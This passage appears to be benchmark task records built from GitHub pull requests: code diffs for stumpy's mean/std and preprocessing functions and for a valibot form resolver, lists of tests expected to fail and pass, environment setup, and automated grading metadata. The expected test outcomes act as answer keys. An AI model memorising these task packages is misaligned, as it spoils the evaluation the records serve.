dtype=float) + left_M, left_Σ = naive_compute_mean_std(T, m) + + right_T, right_M, right_Σ = core.preprocess(T, m) + + npt.assert_almost_equal(left_T, right_T) + npt.assert_almost_equal(left_M, right_M) + npt.assert_almost_equal(left_Σ, right_Σ) + + T = pd.Series(T) + right_T, right_M, right_Σ = core.preprocess(T, m) + + npt.assert_almost_equal(left_T, right_T) + npt.assert_almost_equal(left_M, right_M) + npt.assert_almost_equal(left_Σ, right_Σ) + + def test_array_to_temp_file(): left = np.random.rand() fname = core.array_to_temp_file(left) diff --git a/tests/test_mstump.py b/tests/test_mstump.py index ec0b5fe..0e14bac 100644 --- a/tests/test_mstump.py +++ b/tests/test_mstump.py @@ -40,7 +40,7 @@ def test_multi_mass(T, m): left = utils.naive_multi_mass(Q, T, m) M_T, Σ_T = core.compute_mean_std(T, m) - right = _multi_mass(Q, T, m, M_T, Σ_T) + right = _multi_mass(Q, T, m, M_T, Σ_T, M_T[:, trivial_idx], Σ_T[:, trivial_idx]) npt.assert_almost_equal(left, right) @@ -55,7 +55,9 @@ def test_get_first_mstump_profile(T, m): left_I = left_I[start, :] M_T, Σ_T = core.compute_mean_std(T, m) - right_P, right_I = _get_first_mstump_profile(start, T, T, m, excl_zone, M_T, Σ_T) + right_P, right_I = _get_first_mstump_profile( + start, T, T, m, excl_zone, M_T, Σ_T, M_T, Σ_T + ) npt.assert_almost_equal(left_P, right_P) npt.assert_equal(left_I, right_I)
[ "tests/test_core.py::test_mass_nan[Q0-T0]", "tests/test_core.py::test_mass_nan[Q1-T1]", "tests/test_core.py::test_mass_nan[Q2-T2]", "tests/test_core.py::test_mass_inf[Q0-T0]", "tests/test_core.py::test_mass_inf[Q1-T1]", "tests/test_core.py::test_mass_inf[Q2-T2]", "tests/test_core.py::test_apply_exclusion_zone", "tests/test_core.py::test_apply_exclusion_zone_multidimensional", "tests/test_core.py::test_preprocess" ]
[ "tests/test_core.py::test_check_dtype_float32", "tests/test_core.py::test_check_dtype_float64", "tests/test_core.py::test_check_window_size", "tests/test_core.py::test_sliding_dot_product[Q0-T0]", "tests/test_core.py::test_sliding_dot_product[Q1-T1]", "tests/test_core.py::test_sliding_dot_product[Q2-T2]", "tests/test_core.py::test_compute_mean_std[Q0-T0]", "tests/test_core.py::test_compute_mean_std[Q1-T1]", "tests/test_core.py::test_compute_mean_std[Q2-T2]", "tests/test_core.py::test_compute_mean_std_multidimensional[Q0-T0]", "tests/test_core.py::test_compute_mean_std_multidimensional[Q1-T1]", "tests/test_core.py::test_compute_mean_std_multidimensional[Q2-T2]", "tests/test_core.py::test_calculate_squared_distance_profile[Q0-T0]", "tests/test_core.py::test_calculate_squared_distance_profile[Q1-T1]", "tests/test_core.py::test_calculate_squared_distance_profile[Q2-T2]", "tests/test_core.py::test_calculate_distance_profile[Q0-T0]", "tests/test_core.py::test_calculate_distance_profile[Q1-T1]", "tests/test_core.py::test_calculate_distance_profile[Q2-T2]", "tests/test_core.py::test_mueen_calculate_distance_profile[Q0-T0]", "tests/test_core.py::test_mueen_calculate_distance_profile[Q1-T1]", "tests/test_core.py::test_mueen_calculate_distance_profile[Q2-T2]", "tests/test_core.py::test_mass[Q0-T0]", "tests/test_core.py::test_mass[Q1-T1]", "tests/test_core.py::test_mass[Q2-T2]", "tests/test_core.py::test_array_to_temp_file", "tests/test_core.py::test_get_array_ranges", "tests/test_core.py::test_get_array_ranges_exhausted", "tests/test_mstump.py::test_get_multi_QT[T0-3]", "tests/test_mstump.py::test_get_multi_QT[T1-5]", "tests/test_mstump.py::test_naive_mstump" ]
Function: apply_exclusion_zone(D, idx, excl_zone) Location: stumpy.core Inputs: - D (ndarray): array (1‑D or ND) on which the exclusion zone will be applied; modified in‑place. - idx (int): center index of the exclusion zone. - excl_zone (int): half‑width of the zone; all elements with indices in [idx‑excl_zone, idx+excl_zone] are set to np.inf. Outputs: - None (the input array D is modified in‑place). After execution the specified window contains np.inf. Description: In‑place utility that masks a region around a given index with infinite values, used to enforce exclusion zones in matrix‑profile algorithms. Function: preprocess(T, m) Location: stumpy.core Inputs: - T (array‑like or pandas Series): original time series. - m (int): subsequence/window length. Outputs: - T_out (ndarray): copy of T where any np.inf is first converted to np.nan then all NaNs are replaced by 0. - M_T (ndarray): rolling mean of each length‑m subsequence of the original series (NaNs treated as missing). - Σ_T (ndarray): rolling standard deviation of each length‑m subsequence; NaNs are ignored, and if a subsequence contains only illegal values the std is set to 0. Description: Prepares a time series for distance‑profile calculations by sanitising NaN/Inf values and returning the series together with its rolling statistics. Function: _multi_mass(Q, T, m, M_T, Σ_T, μ_Q, σ_Q, include=None, discords=False) Location: stumpy.mstump Inputs: - Q (ndarray, shape (d, m)): query subsequences for each dimension. - T (ndarray, shape (d, n)): time series for each dimension. - m (int): window size. - M_T (ndarray, shape (d, n‑m+1)): rolling means of T (pre‑computed by core.preprocess). - Σ_T (ndarray, shape (d, n‑m+1)): rolling stds of T (pre‑computed by core.preprocess). - μ_Q (ndarray, shape (d,)): mean of each query dimension (from core.preprocess on Q). - σ_Q (ndarray, shape (d,)): std of each query dimension. - include (ndarray, optional): indices of dimensions to include; defaults to all. 
- discords (bool, optional): flag for discord computation; default False. Outputs: - D (ndarray, shape (d, n‑m+1)): distance matrix; rows where μ_Q is infinite are filled with np.inf, otherwise computed via core.mass. Description: Computes the multi‑dimensional distance profiles for all dimensions, handling dimensions with illegal query statistics by returning infinities. Function: _get_first_mstump_profile(start, T_A, T_B, m, excl_zone, M_T, Σ_T, μ_Q, σ_Q, include=None, discords=False) Location: stumpy.mstump Inputs: - start (int): starting index of the subsequence in T_B. - T_A (ndarray, shape (d, n)): pre‑processed reference series. - T_B (ndarray, shape (d, n)): pre‑processed query series. - m (int): window size. - excl_zone (int): exclusion‑zone half width. - M_T (ndarray): rolling means of T_A. - Σ_T (ndarray): rolling stds of T_A. - μ_Q (ndarray): rolling means of T_B. - σ_Q (ndarray): rolling stds of T_B. - include (ndarray, optional): dimensions to include; default all. - discords (bool, optional): flag for discord computation; default False. Outputs: - (P, PL, PR) (tuple of floats): matrix‑profile value for the start subsequence and the left/right profile values (np.inf if excluded). - (I, IL, IR) (tuple of ints): indices of the nearest neighbor, left neighbor, and right neighbor (‑1 when not defined). Description: Generates the first matrix‑profile entry for a multi‑dimensional STUMP run, applying an exclusion zone and handling illegal query statistics by returning infinities.
custom-check-github
{ "base_image_name": "python_base_310", "install": [ "pip install -q -e .", "pip install -q pytest pandas dask distributed coverage flake8 black" ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/test_core.py tests/test_mstump.py" }
{ "num_modified_files": 8, "num_modified_lines": 202, "pr_author": "mexxexx", "pr_labels": [], "llm_metadata": { "code": "B1", "code_quality": null, "confidence": 0.85, "detected_issues": { "B1": true, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue adds a preprocessing function, exclusion‑zone handling, and NaN/Inf support, and the tests check exactly those behaviours, so the intent is clear and complete. However, the test suite references `utils.replace_inf` without importing the utils module, causing a mismatch between test expectations and the provided code. This is an environment preparation problem rather than a flaw in the specification, so the primary classification is B1. The changes introduce new core functionality, fitting the `core_feat` category, and implementing them requires moderate effort across several modules, estimated at medium difficulty.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "tests reference `utils.replace_inf` but do not import the `utils` module" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, 
"test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
15b290a11ce2389701e16d127365194192b924d4
2020-06-04 14:40:22
codecov-commenter: # [Codecov](https://codecov.io/gh/TDAmeritrade/stumpy/pull/199?src=pr&el=h1) Report > Merging [#199](https://codecov.io/gh/TDAmeritrade/stumpy/pull/199?src=pr&el=desc) into [master](https://codecov.io/gh/TDAmeritrade/stumpy/commit/15b290a11ce2389701e16d127365194192b924d4&el=desc) will **not change** coverage. > The diff coverage is `100.00%`. [![Impacted file tree graph](https://codecov.io/gh/TDAmeritrade/stumpy/pull/199/graphs/tree.svg?width=650&height=150&src=pr&token=u0DooAbGji)](https://codecov.io/gh/TDAmeritrade/stumpy/pull/199?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #199 +/- ## ========================================= Coverage 100.00% 100.00% ========================================= Files 13 13 Lines 1033 1037 +4 ========================================= + Hits 1033 1037 +4 ``` | [Impacted Files](https://codecov.io/gh/TDAmeritrade/stumpy/pull/199?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [stumpy/core.py](https://codecov.io/gh/TDAmeritrade/stumpy/pull/199/diff?src=pr&el=tree#diff-c3R1bXB5L2NvcmUucHk=) | `100.00% <100.00%> (ø)` | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/TDAmeritrade/stumpy/pull/199?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/TDAmeritrade/stumpy/pull/199?src=pr&el=footer). Last update [15b290a...71272e1](https://codecov.io/gh/TDAmeritrade/stumpy/pull/199?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments).
tdameritrade__stumpy-199
diff --git a/stumpy/core.py b/stumpy/core.py index 66b96a9..6e6cb03 100644 --- a/stumpy/core.py +++ b/stumpy/core.py @@ -305,16 +305,20 @@ def compute_mean_std(T, m): for iteration in range(max_iter): try: chunk_size = math.ceil((T.shape[-1] + 1) / num_chunks) + if chunk_size < m: + chunk_size = m mean_chunks = [] std_chunks = [] for chunk in range(num_chunks): start = chunk * chunk_size stop = min(start + chunk_size + m - 1, T.shape[-1]) + if stop - start < m: + break - tmp_mean = np.mean(rolling_window(T[start:stop], m), axis=T.ndim) + tmp_mean = np.mean(rolling_window(T[..., start:stop], m), axis=T.ndim) mean_chunks.append(tmp_mean) - tmp_std = np.nanstd(rolling_window(T[start:stop], m), axis=T.ndim) + tmp_std = np.nanstd(rolling_window(T[..., start:stop], m), axis=T.ndim) std_chunks.append(tmp_std) M_T = np.hstack(mean_chunks)
Fixed Issue #198 This PR fixes issue #198 .
**Title** Robust handling of edge cases in mean‑std computation for rolling windows **Problem** `compute_mean_std` could fail or return incorrect statistics when the data length does not divide evenly into the requested number of chunks, especially when a chunk becomes smaller than the rolling window size. The previous slicing also unintentionally dropped dimensions for multi‑dimensional inputs. **Root Cause** Chunk size was computed without guaranteeing it meets the minimum window length, and slicing omitted the required ellipsis, causing dimension loss and improper handling of short tail segments. **Fix / Expected Behavior** - Enforce a minimum chunk size equal to the rolling window length. - Skip any segment that would be shorter than the window, preventing invalid operations. - Use full‑dimensional slicing to preserve array shape during rolling‑window calculations. - Ensure the function always returns correct mean and standard‑deviation arrays regardless of input length or dimensionality. **Risk & Validation** - Added checks may slightly impact performance on very large datasets; benchmark against prior implementation. - Run the full test suite, with particular focus on edge‑case inputs (short series, high chunk counts, multi‑dimensional arrays) to confirm correctness and absence of regressions.
199
TDAmeritrade/stumpy
diff --git a/tests/test_core.py b/tests/test_core.py index ae1048e..732ae1c 100644 --- a/tests/test_core.py +++ b/tests/test_core.py @@ -1,7 +1,7 @@ import numpy as np import numpy.testing as npt import pandas as pd -from stumpy import core +from stumpy import core, config import pytest import os @@ -101,6 +101,40 @@ def test_compute_mean_std(Q, T): npt.assert_almost_equal(left_Σ_T, right_Σ_T) +@pytest.mark.parametrize("Q, T", test_data) +def test_compute_mean_std_chunked(Q, T): + m = Q.shape[0] + + config.STUMPY_MEAN_STD_NUM_CHUNKS = 2 + left_μ_Q, left_σ_Q = naive_compute_mean_std(Q, m) + left_M_T, left_Σ_T = naive_compute_mean_std(T, m) + right_μ_Q, right_σ_Q = core.compute_mean_std(Q, m) + right_M_T, right_Σ_T = core.compute_mean_std(T, m) + config.STUMPY_MEAN_STD_NUM_CHUNKS = 1 + + npt.assert_almost_equal(left_μ_Q, right_μ_Q) + npt.assert_almost_equal(left_σ_Q, right_σ_Q) + npt.assert_almost_equal(left_M_T, right_M_T) + npt.assert_almost_equal(left_Σ_T, right_Σ_T) + + +@pytest.mark.parametrize("Q, T", test_data) +def test_compute_mean_std_chunked_many(Q, T): + m = Q.shape[0] + + config.STUMPY_MEAN_STD_NUM_CHUNKS = 128 + left_μ_Q, left_σ_Q = naive_compute_mean_std(Q, m) + left_M_T, left_Σ_T = naive_compute_mean_std(T, m) + right_μ_Q, right_σ_Q = core.compute_mean_std(Q, m) + right_M_T, right_Σ_T = core.compute_mean_std(T, m) + config.STUMPY_MEAN_STD_NUM_CHUNKS = 1 + + npt.assert_almost_equal(left_μ_Q, right_μ_Q) + npt.assert_almost_equal(left_σ_Q, right_σ_Q) + npt.assert_almost_equal(left_M_T, right_M_T) + npt.assert_almost_equal(left_Σ_T, right_Σ_T) + + @pytest.mark.parametrize("Q, T", test_data) def test_compute_mean_std_multidimensional(Q, T): m = Q.shape[0] @@ -119,6 +153,46 @@ def test_compute_mean_std_multidimensional(Q, T): npt.assert_almost_equal(left_Σ_T, right_Σ_T) +@pytest.mark.parametrize("Q, T", test_data) +def test_compute_mean_std_multidimensional_chunked(Q, T): + m = Q.shape[0] + + Q = np.array([Q, np.random.uniform(-1000, 1000, [Q.shape[0]])]) + 
T = np.array([T, T, np.random.uniform(-1000, 1000, [T.shape[0]])]) + + config.STUMPY_MEAN_STD_NUM_CHUNKS = 2 + left_μ_Q, left_σ_Q = naive_compute_mean_std_multidimensional(Q, m) + left_M_T, left_Σ_T = naive_compute_mean_std_multidimensional(T, m) + right_μ_Q, right_σ_Q = core.compute_mean_std(Q, m) + right_M_T, right_Σ_T = core.compute_mean_std(T, m) + config.STUMPY_MEAN_STD_NUM_CHUNKS = 1 + + npt.assert_almost_equal(left_μ_Q, right_μ_Q) + npt.assert_almost_equal(left_σ_Q, right_σ_Q) + npt.assert_almost_equal(left_M_T, right_M_T) + npt.assert_almost_equal(left_Σ_T, right_Σ_T) + + +@pytest.mark.parametrize("Q, T", test_data) +def test_compute_mean_std_multidimensional_chunked_many(Q, T): + m = Q.shape[0] + + Q = np.array([Q, np.random.uniform(-1000, 1000, [Q.shape[0]])]) + T = np.array([T, T, np.random.uniform(-1000, 1000, [T.shape[0]])]) + + config.STUMPY_MEAN_STD_NUM_CHUNKS = 128 + left_μ_Q, left_σ_Q = naive_compute_mean_std_multidimensional(Q, m) + left_M_T, left_Σ_T = naive_compute_mean_std_multidimensional(T, m) + right_μ_Q, right_σ_Q = core.compute_mean_std(Q, m) + right_M_T, right_Σ_T = core.compute_mean_std(T, m) + config.STUMPY_MEAN_STD_NUM_CHUNKS = 1 + + npt.assert_almost_equal(left_μ_Q, right_μ_Q) + npt.assert_almost_equal(left_σ_Q, right_σ_Q) + npt.assert_almost_equal(left_M_T, right_M_T) + npt.assert_almost_equal(left_Σ_T, right_Σ_T) + + @pytest.mark.parametrize("Q, T", test_data) def test_calculate_squared_distance_profile(Q, T): m = Q.shape[0]
[ "tests/test_core.py::test_compute_mean_std_chunked[Q0-T0]", "tests/test_core.py::test_compute_mean_std_chunked[Q1-T1]", "tests/test_core.py::test_compute_mean_std_chunked[Q2-T2]", "tests/test_core.py::test_compute_mean_std_chunked_many[Q0-T0]", "tests/test_core.py::test_compute_mean_std_chunked_many[Q1-T1]", "tests/test_core.py::test_compute_mean_std_chunked_many[Q2-T2]", "tests/test_core.py::test_compute_mean_std_multidimensional[Q0-T0]", "tests/test_core.py::test_compute_mean_std_multidimensional[Q1-T1]", "tests/test_core.py::test_compute_mean_std_multidimensional[Q2-T2]", "tests/test_core.py::test_compute_mean_std_multidimensional_chunked[Q0-T0]", "tests/test_core.py::test_compute_mean_std_multidimensional_chunked[Q1-T1]", "tests/test_core.py::test_compute_mean_std_multidimensional_chunked[Q2-T2]", "tests/test_core.py::test_compute_mean_std_multidimensional_chunked_many[Q0-T0]", "tests/test_core.py::test_compute_mean_std_multidimensional_chunked_many[Q1-T1]", "tests/test_core.py::test_compute_mean_std_multidimensional_chunked_many[Q2-T2]", "tests/test_core.py::test_calculate_squared_distance_profile[Q0-T0]", "tests/test_core.py::test_calculate_squared_distance_profile[Q1-T1]", "tests/test_core.py::test_calculate_squared_distance_profile[Q2-T2]", "tests/test_core.py::test_calculate_distance_profile[Q0-T0]", "tests/test_core.py::test_calculate_distance_profile[Q1-T1]", "tests/test_core.py::test_calculate_distance_profile[Q2-T2]", "tests/test_core.py::test_mass[Q0-T0]", "tests/test_core.py::test_mass[Q1-T1]", "tests/test_core.py::test_mass[Q2-T2]", "tests/test_core.py::test_mass_nan[Q0-T0]", "tests/test_core.py::test_mass_nan[Q1-T1]", "tests/test_core.py::test_mass_nan[Q2-T2]", "tests/test_core.py::test_mass_inf[Q0-T0]", "tests/test_core.py::test_mass_inf[Q1-T1]", "tests/test_core.py::test_mass_inf[Q2-T2]", "tests/test_core.py::test_preprocess" ]
[ "tests/test_core.py::test_check_dtype_float32", "tests/test_core.py::test_check_dtype_float64", "tests/test_core.py::test_check_window_size", "tests/test_core.py::test_sliding_dot_product[Q0-T0]", "tests/test_core.py::test_sliding_dot_product[Q1-T1]", "tests/test_core.py::test_sliding_dot_product[Q2-T2]", "tests/test_core.py::test_compute_mean_std[Q0-T0]", "tests/test_core.py::test_compute_mean_std[Q1-T1]", "tests/test_core.py::test_compute_mean_std[Q2-T2]", "tests/test_core.py::test_mueen_calculate_distance_profile[Q0-T0]", "tests/test_core.py::test_mueen_calculate_distance_profile[Q1-T1]", "tests/test_core.py::test_mueen_calculate_distance_profile[Q2-T2]", "tests/test_core.py::test_apply_exclusion_zone", "tests/test_core.py::test_apply_exclusion_zone_multidimensional", "tests/test_core.py::test_array_to_temp_file", "tests/test_core.py::test_get_array_ranges", "tests/test_core.py::test_get_array_ranges_exhausted" ]
Variable: STUMPY_MEAN_STD_NUM_CHUNKS Location: stumpy.config module Inputs: int > 0 – number of chunks to split the time‑series into when computing rolling means and standard deviations (default = 1). Setting this to a larger value enables a chunked (memory‑efficient) implementation. Outputs: None (global configuration flag). The value is read by **stumpy.core.compute_mean_std** to determine the chunk size; changing it alters the internal algorithm but does not affect the function’s return type. Description: Global configuration flag that controls how **core.compute_mean_std** partitions the input series for chunk‑wise mean/std computation. Adjust to trade‑off memory usage vs. speed; must be restored to 1 after use if the default behavior is required.
custom-check-github
{ "base_image_name": "python_base_310", "install": [ "pip install -q -e .", "pip install -q pytest pandas dask distributed coverage flake8 black" ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/test_core.py" }
{ "num_modified_files": 1, "num_modified_lines": 6, "pr_author": "mexxexx", "pr_labels": [], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.88, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "insufficient", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue only says \"Fixed Issue #198\" without describing the required behavior, while the tests add assertions that compute_mean_std must correctly handle chunked processing via the STUMPY_MEAN_STD_NUM_CHUNKS config. The tests therefore introduce expectations not present in the issue description, indicating an ambiguous or missing specification. No other B‑category signals are evident. Hence the primary problem is an ambiguous spec (B4).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests assert behavior of compute_mean_std under different STUMPY_MEAN_STD_NUM_CHUNKS settings, which is not mentioned in the issue text." 
], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
c1d543303e7c0345073b88628604e306dc93d3b6
2023-08-18 13:39:59
github-actions[bot]: **Size Change:** +176 B (+1%) **Total Size:** 25.1 kB | Filename | Size | Change | | | :--- | :---: | :---: | :---: | | `valibot/dist/valibot.js` | 577 B | +56 B (+11%) | ⚠️ | | `valibot/dist/valibot.module.js` | 594 B | +57 B (+11%) | ⚠️ | | `valibot/dist/valibot.umd.js` | 684 B | +63 B (+10%) | ⚠️ | <details><summary>ℹ️ <strong>View Unchanged</strong></summary> | Filename | Size | | :--- | :---: | | `ajv/dist/ajv.js` | 638 B | | `ajv/dist/ajv.module.js` | 597 B | | `ajv/dist/ajv.umd.js` | 751 B | | `arktype/dist/arktype.js` | 327 B | | `arktype/dist/arktype.module.js` | 343 B | | `arktype/dist/arktype.umd.js` | 422 B | | `class-validator/dist/class-validator.js` | 537 B | | `class-validator/dist/class-validator.module.js` | 561 B | | `class-validator/dist/class-validator.umd.js` | 640 B | | `computed-types/dist/computed-types.js` | 386 B | | `computed-types/dist/computed-types.module.js` | 401 B | | `computed-types/dist/computed-types.umd.js` | 477 B | | `dist/resolvers.js` | 359 B | | `dist/resolvers.module.js` | 373 B | | `dist/resolvers.umd.js` | 454 B | | `io-ts/dist/io-ts.js` | 1.28 kB | | `io-ts/dist/io-ts.module.js` | 1.18 kB | | `io-ts/dist/io-ts.umd.js` | 1.41 kB | | `joi/dist/joi.js` | 592 B | | `joi/dist/joi.module.js` | 610 B | | `joi/dist/joi.umd.js` | 698 B | | `nope/dist/nope.js` | 345 B | | `nope/dist/nope.module.js` | 365 B | | `nope/dist/nope.umd.js` | 434 B | | `superstruct/dist/superstruct.js` | 324 B | | `superstruct/dist/superstruct.module.js` | 342 B | | `superstruct/dist/superstruct.umd.js` | 424 B | | `typanion/dist/typanion.js` | 323 B | | `typanion/dist/typanion.module.js` | 336 B | | `typanion/dist/typanion.umd.js` | 418 B | | `typebox/dist/typebox.js` | 464 B | | `typebox/dist/typebox.module.js` | 482 B | | `typebox/dist/typebox.umd.js` | 579 B | | `vest/dist/vest.js` | 480 B | | `vest/dist/vest.module.js` | 443 B | | `vest/dist/vest.umd.js` | 569 B | | `yup/dist/yup.js` | 626 B | | `yup/dist/yup.module.js` | 640 
B | | `yup/dist/yup.umd.js` | 729 B | | `zod/dist/zod.js` | 581 B | | `zod/dist/zod.module.js` | 602 B | | `zod/dist/zod.umd.js` | 688 B | </details> <a href="https://github.com/preactjs/compressed-size-action"><sub>compressed-size-action</sub></a>
react-hook-form__resolvers-620
diff --git a/valibot/src/valibot.ts b/valibot/src/valibot.ts index 9569bd4..ec269b1 100644 --- a/valibot/src/valibot.ts +++ b/valibot/src/valibot.ts @@ -7,70 +7,85 @@ import { parse, parseAsync, } from 'valibot'; -import { FieldErrors, FieldError } from 'react-hook-form'; - -type FlatErrors = Record<string, [FieldError, ...FieldError[]]>; +import { FieldErrors, FieldError, appendErrors } from 'react-hook-form'; +const parseErrors = ( + valiErrors: ValiError, + validateAllFieldCriteria: boolean, +): FieldErrors => { + const errors: Record<string, FieldError> = {}; + for (; valiErrors.issues.length;) { + const error = valiErrors.issues[0]; + if (!error.path) { + continue; + } + const _path = error.path.map(({ key }) => key).join('.'); -const parseErrors = (error: ValiError): FieldErrors => { - const errors = error.issues.reduce<FlatErrors>((flatErrors, issue) => { - if (issue.path) { - const path = issue.path.map(({ key }) => key).join('.'); - flatErrors[path] = [ - ...(flatErrors[path] || []), - { - message: issue.message, - type: issue.validation, - }, - ]; + if (!errors[_path]) { + errors[_path] = { message: error.message, type: error.validation }; } - return flatErrors; - }, {}); + if (validateAllFieldCriteria) { + const types = errors[_path].types; + const messages = types && types[error.validation]; - return Object.entries(errors).reduce<FieldErrors>((acc, [path, errors]) => { - const [firstError] = errors; - acc[path] = { - message: firstError.message, - type: firstError.type, - }; + errors[_path] = appendErrors( + _path, + validateAllFieldCriteria, + errors, + error.validation, + messages + ? 
([] as string[]).concat(messages as string[], error.message) + : error.message, + ) as FieldError; + } + + valiErrors.issues.shift(); + } - return acc; - }, {}); + return errors; }; export const valibotResolver: Resolver = - ( - schema, - schemaOptions = { - abortEarly: false, - abortPipeEarly: false, - }, - resolverOptions = { - mode: 'async', - raw: false, - }, - ) => - async (values, _, options) => { - try { - const { mode, raw } = resolverOptions; - const parsed = - mode === 'sync' - ? parse(schema as BaseSchema, values, schemaOptions) - : await parseAsync( + (schema, schemaOptions, resolverOptions = {}) => + async (values, _, options) => { + try { + const schemaOpts = Object.assign( + {}, + { + abortEarly: false, + abortPipeEarly: false, + }, + schemaOptions, + ); + + const parsed = + resolverOptions.mode === 'sync' + ? parse(schema as BaseSchema, values, schemaOpts) + : await parseAsync( schema as BaseSchema | BaseSchemaAsync, values, - schemaOptions, + schemaOpts, ); - return { values: raw ? values : parsed, errors: {} as FieldErrors }; - } catch (error) { - if (error instanceof ValiError) { return { - values: {}, - errors: toNestError(parseErrors(error), options), + values: resolverOptions.raw ? values : parsed, + errors: {} as FieldErrors, }; - } + } catch (error) { + if (error instanceof ValiError) { + return { + values: {}, + errors: toNestError( + parseErrors( + error, + !options.shouldUseNativeValidation && + options.criteriaMode === 'all', + ), + options, + ), + }; + } - throw error; - } - }; + throw error; + } + };
feat(valibot): add more tests, support of `criteriaMode` and reduce size
**Title** Add full `criteriaMode` support to Valibot resolver and streamline defaults **Problem** The resolver only returned the first validation error per field, ignoring the `criteriaMode: 'all'` option. Default schema options were also not merged reliably, leading to inconsistent behavior across sync/async modes. **Root Cause** Error parsing treated each field as a single error and omitted the flag indicating whether to collect all criteria. Additionally, schema option handling was hard‑coded instead of being merged with user‑provided values. **Fix / Expected Behavior** - Respect `criteriaMode` by aggregating all validation errors for a field when set to `'all'`. - Use the core `appendErrors` utility to build the full error set per field. - Merge default schema options with any user‑supplied options to ensure consistent parsing. - Preserve existing behavior for `criteriaMode` default (`'firstError'`) and for both sync and async parsing modes. - Reduce bundle size by simplifying resolver construction and option handling. **Risk & Validation** - Verify that existing form validation tests still pass unchanged. - Add tests confirming that multiple errors are returned per field when `criteriaMode: 'all'` is used. - Manually test both synchronous and asynchronous schema parsing paths to ensure error aggregation works correctly.
620
react-hook-form/resolvers
diff --git a/valibot/src/__tests__/Form-native-validation.tsx b/valibot/src/__tests__/Form-native-validation.tsx new file mode 100644 index 0000000..4439cbb --- /dev/null +++ b/valibot/src/__tests__/Form-native-validation.tsx @@ -0,0 +1,81 @@ +import React from 'react'; +import { useForm } from 'react-hook-form'; +import { render, screen } from '@testing-library/react'; +import user from '@testing-library/user-event'; +import { string, required, object, minLength } from 'valibot'; +import { valibotResolver } from '..'; + +const USERNAME_REQUIRED_MESSAGE = 'username field is required'; +const PASSWORD_REQUIRED_MESSAGE = 'password field is required'; + +const schema = required( + object({ + username: string(USERNAME_REQUIRED_MESSAGE, [ + minLength(2, USERNAME_REQUIRED_MESSAGE), + ]), + password: string(PASSWORD_REQUIRED_MESSAGE, [ + minLength(2, PASSWORD_REQUIRED_MESSAGE), + ]), + }), +); + +type FormData = { username: string; password: string }; + +interface Props { + onSubmit: (data: FormData) => void; +} + +function TestComponent({ onSubmit }: Props) { + const { register, handleSubmit } = useForm<FormData>({ + resolver: valibotResolver(schema), + shouldUseNativeValidation: true, + }); + + return ( + <form onSubmit={handleSubmit(onSubmit)}> + <input {...register('username')} placeholder="username" /> + + <input {...register('password')} placeholder="password" /> + + <button type="submit">submit</button> + </form> + ); +} + +test("form's native validation with Zod", async () => { + const handleSubmit = vi.fn(); + render(<TestComponent onSubmit={handleSubmit} />); + + // username + let usernameField = screen.getByPlaceholderText( + /username/i, + ) as HTMLInputElement; + expect(usernameField.validity.valid).toBe(true); + expect(usernameField.validationMessage).toBe(''); + + // password + let passwordField = screen.getByPlaceholderText( + /password/i, + ) as HTMLInputElement; + expect(passwordField.validity.valid).toBe(true); + 
